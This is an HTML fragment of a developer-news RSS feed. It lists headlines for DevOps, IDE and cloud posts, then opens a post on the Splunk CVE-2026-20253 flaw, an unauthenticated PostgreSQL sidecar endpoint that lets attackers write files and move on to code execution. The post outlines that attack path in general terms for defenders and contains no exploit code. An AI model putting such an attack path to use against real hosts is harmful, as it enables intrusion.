          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As enterprises scale autonomous AI agents into production, enabling safe innovation requires robust architectural guardrails. AI agents connect across tools and datasets, so it’s essential to establis</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/identity-security/securing-agentic-ai-whats-new-in-vpc-service-controls/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-sovereign-open-and-carrier-grade-what-suse-telco-cloud-36-actually-delivers" class="group relative scroll-mt-24">
        <a href="#h3-sovereign-open-and-carrier-grade-what-suse-telco-cloud-36-actually-delivers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Sovereign, Open, and Carrier-Grade: What SUSE Telco Cloud 3.6 Actually Delivers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-sovereign-open-and-carrier-grade-what-suse-telco-cloud-36-actually-delivers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Table of Contents Introduction What “Technology Preview” Actually Means MetalLB BGP Mode in SUSE Telco Cloud 3.6: Load Balancing That Talks to Your Network PTP (Precision Time Protocol) for 5G: The Pr</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/sovereign-open-and-carrier-grade-what-suse-telco-cloud-3-6-actually-delivers/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-with-google-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ec2-r8g-instances-now-available-in-additional-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ec2-r8g-instances-now-available-in-additional-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EC2 R8g instances now available in additional regions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-ec2-r8g-instances-now-available-in-additional-regions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Starting today, Amazon Elastic Compute Cloud (Amazon EC2) R8g instances are available in AWS Asia Pacific (Thailand, New Zealand), AWS Africa (Cape Town), AWS Europe (Milan), and AWS Canada West (Calg</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ec2-r8g-instances-additional-regions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-every-agents-connection-to-railway" class="group relative scroll-mt-24">
        <a href="#h3-every-agents-connection-to-railway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Every (Agents) Connection to Railway
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-every-agents-connection-to-railway"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We&#39;ve created a few workflow patterns on how to get your agent talking to Railway peacefully. The balance of Local and Remote MCPs, Railway&#39;s Agent Skills, the CLI + Railway Agent give your local harn</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/agent-connection-to-railway"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-ai-is-transforming-devops-and-cloud-engineering" class="group relative scroll-mt-24">
        <a href="#h3-how-ai-is-transforming-devops-and-cloud-engineering" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How AI Is Transforming DevOps and Cloud Engineering
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-ai-is-transforming-devops-and-cloud-engineering"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>While AI is often associated with chatbots or generative models, one of its most significant impacts is happening behind the scenes — within DevOps and cloud engineering.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/how-ai-is-transforming-devops-and-cloud-engineering/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-misc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-visual-studio-code-1127-insiders" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1127-insiders" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.127 (Insiders)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1127-insiders"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.127 (Insiders) Read the full article</p>
<p><strong>📅 Jul 1, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_127"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kotlin-notebook-sunset" class="group relative scroll-mt-24">
        <a href="#h3-kotlin-notebook-sunset" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kotlin Notebook Sunset
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kotlin-notebook-sunset"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Starting from IntelliJ IDEA 2026.2, JetBrains will sunset Kotlin Notebook as a product and will no longer maintain it. The plugin will remain available on an open-source model so the community can con</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/idea/2026/06/kotlin-notebook-sunset/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-greptile-cursor-and-devin-agree-that-agents-should-run-their-code-what-they-run-it-against-matters" class="group relative scroll-mt-24">
        <a href="#h3-greptile-cursor-and-devin-agree-that-agents-should-run-their-code-what-they-run-it-against-matters" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Greptile, Cursor, and Devin agree that agents should run their code. What they run it against matters.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-greptile-cursor-and-devin-agree-that-agents-should-run-their-code-what-they-run-it-against-matters"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The industry has recognized that shipping agent code at scale requires runtime verification, and it is moving that way fast. The post Greptile, Cursor, and Devin agree that agents should run their cod</p>
<p><strong>📅 Jun 27, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/runtime-verification-coding-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-vibe-slop-is-the-symptom-context-debt-is-the-disease" class="group relative scroll-mt-24">
        <a href="#h3-vibe-slop-is-the-symptom-context-debt-is-the-disease" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Vibe slop is the symptom. Context debt is the disease.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-vibe-slop-is-the-symptom-context-debt-is-the-disease"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Some of the engineers who made vibe coding possible have decided it’s a problem. Last month, The Wall Street Journal’s The post Vibe slop is the symptom. Context debt is the disease. appeared first on</p>
<p><strong>📅 Jun 27, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/vibe-coding-context-debt/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-is-accelerating-how-fast-we-build-the-wrong-thing" class="group relative scroll-mt-24">
        <a href="#h3-ai-is-accelerating-how-fast-we-build-the-wrong-thing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Is Accelerating How Fast We Build the Wrong Thing
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-is-accelerating-how-fast-we-build-the-wrong-thing"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI coding assistants have made it trivially easy to ship software faster — and that is precisely the problem. Human developers used to absorb the gaps in a vague spec by asking questions, reading betw</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-is-accelerating-how-fast-we-build-the-wrong-thing/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-open-sourcing-the-lsp-client-api-in-intellij-idea-20262" class="group relative scroll-mt-24">
        <a href="#h3-open-sourcing-the-lsp-client-api-in-intellij-idea-20262" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Open-Sourcing the LSP Client API in IntelliJ IDEA 2026.2
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-open-sourcing-the-lsp-client-api-in-intellij-idea-20262"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Language Server Protocol (LSP) solves a real problem: before, each IDE or editor had to implement support for a specific language separately. A language server puts that work in one place and exposes </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/platform/2026/06/open-sourcing-the-lsp-client-api-in-intellij-idea-2026-2/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-challenges-designers-face-in-open-source-and-how-to-fix-them" class="group relative scroll-mt-24">
        <a href="#h3-challenges-designers-face-in-open-source-and-how-to-fix-them" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Challenges designers face in open source (and how to fix them)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-challenges-designers-face-in-open-source-and-how-to-fix-them"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Open source powers up to 90% of modern software, yet many projects lack usability. Canonical’s Design team surveyed 115 cross-functional professionals to uncover the 4 core challenges UI/UX designers </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/challenges-designers-face-in-open-source-and-how-to-fix-them"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-iterating-faster-with-typescript-7" class="group relative scroll-mt-24">
        <a href="#h3-iterating-faster-with-typescript-7" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Iterating faster with TypeScript 7
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-iterating-faster-with-typescript-7"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>How the VS Code and TypeScript teams collaborated to adopt TypeScript 7 and speed up VS Code development Read the full article</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/blogs/2026/06/26/iterating-faster-with-ts-7"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-dev-containers-story-introducing-eelapi-for-plugin-authors" class="group relative scroll-mt-24">
        <a href="#h3-the-dev-containers-story-introducing-eelapi-for-plugin-authors" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Dev Containers Story: Introducing EelApi for Plugin Authors
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-dev-containers-story-introducing-eelapi-for-plugin-authors"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Modern development has shifted one old IDE paradigm significantly: Now, not only is it possible that a project is not hosted on the same physical or remote machine as your IDE instance, it could even </p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/platform/2026/06/the-dev-containers-story-introducing-eelapi-for-plugin-authors/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-real-winner-of-cursors-60b-acquisition-wont-be-ai-coding-assistants" class="group relative scroll-mt-24">
        <a href="#h3-the-real-winner-of-cursors-60b-acquisition-wont-be-ai-coding-assistants" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Real Winner of Cursor’s $60B Acquisition Won’t Be AI Coding Assistants
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-real-winner-of-cursors-60b-acquisition-wont-be-ai-coding-assistants"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When news broke that SpaceX would acquire Cursor’s parent company, Anysphere, in a reported $60 billion all-stock deal, most of the discussion centered around AI. This was another milestone and enormo</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/cursor-s-60b-acquisition/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-automated-network-configuration-assurance-matters-for-enterprise-netops" class="group relative scroll-mt-24">
        <a href="#h3-why-automated-network-configuration-assurance-matters-for-enterprise-netops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why automated network configuration assurance matters for enterprise NetOps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-automated-network-configuration-assurance-matters-for-enterprise-netops"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Every network operations (NetOps) professional knows the anxiety of a manual configuration update. Even when you meticulously plan the change, a single unrecorded variable or an ad hoc configuration t</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/why-automated-network-configuration-assurance-matters-enterprise-netops"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-visual-studio-code-1126" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1126" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.126
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1126"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what is new in Visual Studio Code 1.126 Read the full article</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_126"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Splunk Shipped an Unauthenticated Database Sidecar: CVE-2026-20253]]></title>
      <link>https://devops-daily.com/posts/splunk-postgres-sidecar-rce-cve-2026-20253</link>
      <description><![CDATA[You did not install a PostgreSQL server, but Splunk Enterprise 10 did, and in affected versions its sidecar endpoint had no authentication. The result is a pre-auth, CVSS 9.8 path to writing files on the host as the Splunk user, now on CISA's actively-exploited list. The bug is patched; the broader lesson is about every helper service your tools quietly bundle.]]></description>
      <pubDate>Sat, 27 Jun 2026 16:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/splunk-postgres-sidecar-rce-cve-2026-20253</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[security]]></category><category><![CDATA[splunk]]></category><category><![CDATA[cve]]></category><category><![CDATA[observability]]></category><category><![CDATA[sidecar]]></category>
      <content:encoded><![CDATA[<p>The thing about your security and observability tools is that they run with a lot of access. They read your logs, reach into your hosts, and sit on a trusted part of the network. So when one of them quietly ships a service you did not know about, and that service answers the network with no authentication, the blast radius is exactly as bad as it sounds.</p>
<p>That is CVE-2026-20253, a critical flaw in Splunk Enterprise. Splunk 10 bundles a PostgreSQL sidecar to back some of its newer features, and in affected versions the endpoint that talks to that sidecar did not check who was calling it. Anyone who could reach it over the network could invoke file operations without credentials, which is a pre-auth foothold on a box that, being a SIEM, sees everything. It is rated <strong>CVSS 9.8</strong>, it is patched, and CISA added it to the Known Exploited Vulnerabilities catalog on June 18, 2026, upgrading it from proof-of-concept to active exploitation the next day.</p>
<p>Here is what the bug is, what to do about it today, and the more useful point hiding underneath it.</p>
<h2 id="h2-what-the-bug-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug is
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-bug-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The vulnerable component is the PostgreSQL sidecar service that ships with Splunk Enterprise 10. Splunk runs it as a companion process to support functionality added in the 10 line. The problem is classic and is captured exactly by its weakness class, <a href="https://cwe.mitre.org/data/definitions/306.html">CWE-306: Missing Authentication for Critical Function</a>: the sidecar&#39;s endpoint exposed file operations and never verified the caller.</p>
<p>In practice that means an unauthenticated, network-reachable attacker can <strong>create or truncate arbitrary files</strong> on the host, running as the Splunk user. Arbitrary file write as a service account is not the end state an attacker wants, it is the stepping stone: write to a location the platform later executes, clobber a config, or drop a script, and file-write becomes remote code execution. That escalation is why the industry reporting calls this an unauthenticated RCE and why it is being exploited in the wild rather than sitting as a theoretical write primitive.</p>
